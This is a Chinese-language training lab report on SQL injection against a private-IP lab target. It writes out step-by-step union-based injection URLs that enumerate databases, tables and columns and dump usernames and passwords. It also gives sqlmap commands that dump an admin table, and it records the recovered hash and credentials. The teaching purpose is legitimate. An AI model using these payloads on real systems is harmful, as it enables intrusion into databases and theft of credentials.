实验目的
使学员了解SQL注入的原理和利用方法
实验内容
- 实验靶机URL:http://10.110.2.145:8008/

- 通过手工注入获取admin账户的密码
- 实验过程进行截图,要求必须要有payload和结果截图
实验过程截图
- SQL手工注入
http://10.110.2.145:8008/article.php?id=1 and 1=1????? #有回显

http://10.110.2.145:8008/article.php?id=1 and 1=2????? #无回显

Order by 判断字段数
http://10.110.2.145:8008/article.php?id=1 order by 18???????? #有回显

http://10.110.2.145:8008/article.php?id=1 order by 19???????? #无回显

获取当前数据库:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

获取当前数据库的表:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

获取yzsoumember表的字段:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’yzsoumember’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

获取yzsoumember表里的username,password字段内容:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

- SQLMAP工具注入
sqlmap扫描网站:sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1"

列出数据库名:sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" --dbs
找到dede数据库:

列出dede数据库下的表:
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -tables
找到dede_admin表

显示dede_admin表中所有内容
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -T dede_admin --dump

Pwd=f297a57a5a743894a0e4
账号admin、密码admin

|